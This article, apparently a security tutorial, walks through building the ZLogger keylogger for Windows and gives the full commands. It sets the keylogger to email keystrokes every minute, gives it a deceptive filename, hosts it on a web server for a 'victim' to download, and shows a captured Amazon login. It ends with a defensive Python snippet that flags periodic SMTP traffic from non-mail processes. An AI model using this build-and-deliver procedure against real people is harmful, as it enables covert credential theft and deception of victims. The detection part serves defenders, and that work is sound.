Keyloggers are a form of monitoring software that records a user’s keystrokes. These keystroke loggers, one of the oldest types of cyber attack, record the information you type into a website or application and send it to a third party.
ZLogger is a Python-based keylogger written by security professional Zaid Al-Quraishi. Its main feature is creating a persistent keylogger for Windows and Linux operating systems. The tool does not require admin privileges, and it starts at system startup. It captures every keystroke and sends a report via email to an attacker.
To download ZLogger, visit the following page “https://github.com/z00z/ZLogger” and copy the downloadable link.
Open your terminal and download the tool using the “git clone” command.
Ex: (root@kali:/opt# git clone https://github.com/z00z/ZLogger.git).
Next, change your directory to “ZLogger” and list the contents.
To run the program, we use the “python” command. Before specifying any options, we list all available options with the “--help” option.
Ex: (root@kali:/opt/ZLogger# python zlogger.py --help).
Now let’s create a keylogger and see it in action. In this example, we’ll be targeting a Windows-based operating system using the “-w” option, with the interval “-i” set to 60 seconds, so our keylogger will send a report every minute. Next, we need to provide our email address using the “-e” option and the password of the email account using “-p”. We need to provide this information so the keylogger knows where to send the captured data. Lastly, we name the output keylogger file using the “-o” option.
Ex: (root@kali:/opt/ZLogger# python zlogger.py -i 60 -w -e jdoe76781@gmail.com -p johndoesecurity -o please_click_me_I_am_not_a_keylogger).
Once the keylogger completes the process, it will be saved in the “ZLogger/dist/” directory as a “please_click_me_I_am_not_a_keylogger” file. Before executing this file on the target computer, don’t forget to allow less secure applications in your Gmail account. Use the following link to do so “https://myaccount.google.com/lesssecureapps.”
Next, copy the file to our web server so it can be reached and downloaded easily from the target computer.
Ex: (root@kali:/opt/ZLogger/dist# cp please_click_me_I_am_not_a_keylogger.exe /var/www/html/Evil-Files/).
Now let’s download it to our victim PC and see it in action.
Once our victim runs the executable and types or browses something, our keylogger will capture the keystrokes and send them to our email address.
As shown in the image below, we managed to receive a report from ZLogger with a captured username and password from Amazon.
Keyloggers are used by criminals to steal personal or financial information, such as banking information, which they then sell or use for profit. They do, however, have legitimate uses in the workplace, such as troubleshooting, improving user experience, and monitoring employees. Keylogging is also used for monitoring by law enforcement and intelligence agencies.
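The keylogger built above reports by email on a fixed timer (60 seconds with “-i 60”), which leaves a network pattern defenders can look for: a process that is not a mail client opening SMTP connections at a near-constant interval. The following is an added example, not part of ZLogger or the original article; the log tuple format, the port set, the allowlist and the process names are constructed assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Assumption: common SMTP ports; the article only says reports go out "via email".
SMTP_PORTS = {25, 465, 587}
# Assumption: hypothetical allowlist of processes expected to speak SMTP on this host.
MAIL_CLIENTS = {"thunderbird.exe", "outlook.exe"}

# Constructed sample records: (epoch seconds, process name, destination port).
SAMPLE_LOG = [
    (1000, "outlook.exe", 587),
    (1003, "chrome.exe", 443),
    (1060, "updater_helper.exe", 587),
    (1120, "updater_helper.exe", 587),
    (1181, "updater_helper.exe", 587),
    (1240, "updater_helper.exe", 587),
    (1300, "updater_helper.exe", 587),
    (1900, "outlook.exe", 587),
    (2500, "backup.exe", 465),
    (9100, "backup.exe", 465),
]

def find_smtp_beacons(events, min_events=4, max_jitter=0.1):
    """Return {process: mean_interval_seconds} for non-mail processes whose
    SMTP connections recur at a near-constant interval."""
    times = defaultdict(list)
    for ts, proc, port in events:
        if port in SMTP_PORTS and proc.lower() not in MAIL_CLIENTS:
            times[proc.lower()].append(ts)
    flagged = {}
    for proc, stamps in times.items():
        if len(stamps) < min_events:
            continue  # too few connections to judge periodicity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        # Coefficient of variation: a low value means timer-driven traffic.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            flagged[proc] = round(avg)
    return flagged

if __name__ == "__main__":
    for proc, interval in find_smtp_beacons(SAMPLE_LOG).items():
        print(f"{proc}: SMTP connection every ~{interval}s from a non-mail process")
```

On a real host the input would come from connection telemetry such as EDR or firewall logs, and the allowlist and jitter threshold need tuning to the environment.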